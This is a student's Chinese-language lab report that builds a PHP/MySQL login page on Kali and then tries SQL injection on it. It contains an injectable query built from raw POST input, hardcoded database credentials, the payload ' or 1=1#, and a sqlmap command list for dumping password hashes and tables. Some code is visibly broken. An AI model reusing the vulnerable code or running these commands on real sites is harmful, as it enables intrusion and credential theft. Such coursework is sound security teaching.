2017-2018 Exp8 Web基础 20155214

Exp8 Web基础

---

目录

• Exp8 Web基础
  • 实验内容
    • 建站过程
      • Web前端：HTML基础
      • 数据库：MySQL基础
      • Web后台：PHP基础
    • SQL注入
  • 知识点

实验内容

实验环境

• 主机 Kali
• 靶机 Kali

实验工具

• 后台语言 'PHP'
• 服务器 'Apache'
• 数据库 'Mysql'

---

建站过程

本次实验，利用Kali内的Apache服务器建站

首先，利用

root@Kali:~# sudo apt-get install apache2

• 下载安装apache

root@Kali:~# apachectl start

• 打开Apache服务
  
  

root@Kali:~# netstat -aptn

• 查看一下端口占用

Web前端：HTML基础

root@Kali:~# cd var/www/html

• 找到Apache的工作目录,之后需要在该目录下创建一个前端页面login.html。

具体代码见知识点

<meta charset="UTF-8"> //设置页面编码格式，可以解决乱码情况
···
<form method ="POST" action="login_controller.php" name="loginform"  > //表单属性，表单名称loginform,通过POST传输到后台，调用login_controller.php这一后台文件
···
<td>
<input type="text" name="username" value="Your name" size="20" maxlength="20" onfocus="if (this.value=='Your name') this.value='';" />
//文本框，名称username，长度为20，默认值为Your name,当为默认值时，提交null。
</td>
···
<td>
<input type="password" name="password" value="Your password" size="20" maxlength="20" onfocus="if (this.value=='Your password') this.value='';" />
//密码框，名称为password,长度为20，默认值为Your password,当为默认值时，提交null。
</td>
···
<script language="javascript">  //js脚本，通过onclick()调用
    function validateLogin(){
        var sUserName = document.loginform.username.value ;
        var sPassword = document.loginform.password.value ;
        //获取表单中用户名密码值
        if ((sUserName =="") || (sUserName=="Your name")){
            alert("请输入用户名!");
            return false ;
        }  

        if ((sPassword =="") || (sPassword=="Your password")){
            alert("请输入密码!");
            return false ;
        }
    //判断为空，弹出alert提示
    }
</script>  

• 效果如下
  
  

数据库：MySQL基础

• 为了能够储存用户名密码，我们需要建立一个账号数据库。

root@Kali:~# /etc/init.d/mysql start

• 打开Kali的mysql服务

root@Kali:~# mysql -u root -p

• 登录mysql,默认密码为p@ssw0rd

MariaDB [(none)]> use mysql //使用mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> update user set password=PASSWORD("密码") where user='root';//更新用户密码

MariaDB [mysql]> flush privileges;//提权
Query OK, 0 rows affected (0.00 sec)

MariaDB [mysql]> quit//退出后重新登录

• 设置mysql

MariaDB [mysql]> create database exp8_login_db;
//创建一个数据库
Query OK, 1 row affected (0.01 sec)

MariaDB [mysql]> use exp8_login_db;
Database changed

MariaDB [exp8_login_db]> create table exp8_login_table (login_username VARCHAR(20),login_pwd VARCHAR(20));
Query OK, 0 rows affected (0.04 sec)
//创建一个数据表并设置字段

MariaDB [exp8_login_db]> show tables;
+-------------------------+
| Tables_in_exp8_login_db |
+-------------------------+
| exp8_login_table        |
+-------------------------+

• 需要建立一个数据库，在新建一张数据表，表中有账号，密码字段

MariaDB [exp8_login_db]> insert into exp8_login_table values('admin','test1234');//插入一条数据
Query OK, 1 row affected (0.01 sec)

MariaDB [exp8_login_db]> select * from exp8_login_table;
+----------------+-----------+
| login_username | login_pwd |
+----------------+-----------+
| admin          | test1234  |
+----------------+-----------+
1 row in set (0.00 sec)

• 为网站提供一对账号，密码。

Web后台：PHP基础

• 有了前端页面，数据库之后，我们需要用PHP语言写一个后台，用以处理接受到的前端数据，并链接数据库，比对前端接受的账号密码与数据库中是否匹配。

• 在/var/www/html目录下新建一个PHP文件login_controller.php

具体代码见知识点

$uname=($_POST["username"]);
$pwd=($_POST["password"]);

 echo $uname;
 echo $pwd;

• 用POST方法获取前端username,password并储存在变量中,可以用echo查看返回值。
• 这里注意前后台方法必须相同，否则接收不到数据。

GET 和 POST 被视作 $_GET 和 $_POST。它们是超全局变量，这意味着对它们的访问无需考虑作用域 - 无需任何特殊代码，您能够从任何函数、类或文件访问它们。

• $_GET 是通过 URL 参数传递到当前脚本的变量数组。
• $_POST 是通过 HTTP POST 传递到当前脚本的变量数组。

何时使用 GET？

通过 GET 方法从表单发送的信息对任何人都是可见的（所有变量名和值都显示在 URL 中）。GET 对所发送信息的数量也有限制。限制在大于 2000 个字符。不过，由于变量显示在 URL 中，把页面添加到书签中也更为方便。

GET 可用于发送非敏感的数据。

注释：绝不能使用 GET 来发送密码或其他敏感信息！

何时使用 POST？

通过 POST 方法从表单发送的信息对其他人是不可见的（所有名称/值会被嵌入 HTTP 请求的主体中），并且对所发送信息的数量也无限制。

此外 POST 支持高阶功能，比如在向服务器上传文件时进行 multi-part 二进制输入。

不过，由于变量未显示在 URL 中，也就无法将页面添加到书签。

提示：开发者偏爱 POST 来发送表单数据。

$query_str=
"SELECT * FROM exp8_login_table where login_username='{$uname}' and login_pwd='{$pwd}';";

• 设计一条SQL语句，查询对应账号密码的数据

$con = mysql_connect("localhost:3306","root","toor");
mysql_select_db("exp8_login_db", $con);

• 链接本地数据库,依次是地址，账号，密码,并选择数据库。

if ($result = $mysql_query($query_str)) {
    if ($result->num_rows > 0 ){
        echo "<br> Wellcome login Mr/Mrs:{$uname} <br> ";
    } else {
        echo "<br> login failed!!!! <br> " ;
    }

• 接受数据库返回查询结果，非零则返回登陆成功，否则登录失败。

由于php缺少mysql扩展模块，最终后台连接mysql失败。

SQL注入

Tip: 这边利用一下之前写的java网站，尝试注入

1.在用户名输入框中输入' or 1=1#，密码随便输入，这时候的合成后的SQL查询语句为select * from lxmtable where username='' or 1=1#' and password=''，#相当于注释符，会把后面的内容都注释掉，而1=1是永真式，所以这个条件肯定恒成立，所以能够成功登陆：

并没有成功，原因其实很简单，因为登录的账号类型是数字，而注入的是字符串，造成了错误抛出。

2.sqlmap攻击

(1)判断当前用户是否是dba:  ./sqlmap.py -u "url" --is-dba -v 1
(2)列出数据库管理系统用户：./sqlmap.py -u "url" --users -v 0
(3)数据库用户密码(hash):
./sqlmap.py -u "url" --passwords -v 0
./sqlmap.py -u "url" --passwords -U sa -v 0
(4)查看用户权限：
./sqlmap.py -u "url" --privileges -v 0
./sqlmap.py -u "url" --privileges -U postgres -v 0
(5)列出数据库：
./sqlmap.py -u "url" --dbs -v 0
(6)列出数据库表：
./sqlmap.py -u "url" --tables -D "information_scheam"
(7)列出表中的列名：
./sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1
(8)列出指定列的内容：
./sqlmap.py -u "url" --dump -T "users" -D "testdb" -C “指定字段”

找到自己的注入点

mybatis的mapper中getUsers函数

但是注入被过滤了，通过后台可以看到sqlmap的字典注入字段，以及后台的抛出日志。

---

知识点

1.前端HTML文件 login.html

<html>
<head>
<meta charset="UTF-8">
<title>test</title>
</head>
<body>
<table>
    <form method ="POST" action="login_controller.php" name="loginform"  >
    <tr>
    <td>用户名：</td>
    <td><input type="text" name="username" value="Your name" size="20" maxlength="20" onfocus="if (this.value=='Your name') this.value='';" /></td>
    <td> </td>
    <td> </td>
    </tr>
    <tr>
    <td>密  码：</td>
    <td><input type="password" name="password" value="Your password" size="20" maxlength="20" onfocus="if (this.value=='Your password') this.value='';" /></td>
    <td> </td>
    <td> </td>
    </tr>
    <tr>
    <td><input type="checkbox" name="zlogin" value="1">自动登录</td>
    </tr>
    <table>
    <tr>
        <td><input type="submit" name="login" value="登录" onClick="return validateLogin()"/></td>
            <td><input type="reset" name="rs" value="重置" /></td>
        </tr>
    </table>
    </form>
</table>   

<script language="javascript">
    function validateLogin(){
        var sUserName = document.loginform.username.value ;
        var sPassword = document.loginform.password.value ;
        if ((sUserName =="") || (sUserName=="Your name")){
            alert("请输入用户名!");
            return false ;
        }  

        if ((sPassword =="") || (sPassword=="Your password")){
            alert("请输入密码!");
            return false ;
        }  

    }
</script>
</body>
</html>

2.后台文件login_controller.php

<?php

$uname=($_POST["username"]);
$pwd=($_POST["password"]);

 echo "<br>$uname<br>";
 echo "<br>$pwd<br>";

$query_str="SELECT * FROM exp8_login_table where login_username='{$uname}' and login_pwd='{$pwd}';";

$con = mysql_connect("localhost:3306","root","toor");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }
echo "connect ok!";

mysql_select_db("exp8_login_db", $con);

/* Select queries return a resultset */
if ($result = mysql_query($query_str)) {
    if ($result->num_rows > 0 ){
        echo "<br> Wellcome login Mr/Mrs:{$uname} <br> ";
    } else {
        echo "<br> login failed!!!! <br> " ;
    }

    /* free result set */
    $result->close();
}

mysql_close($con);

?>

---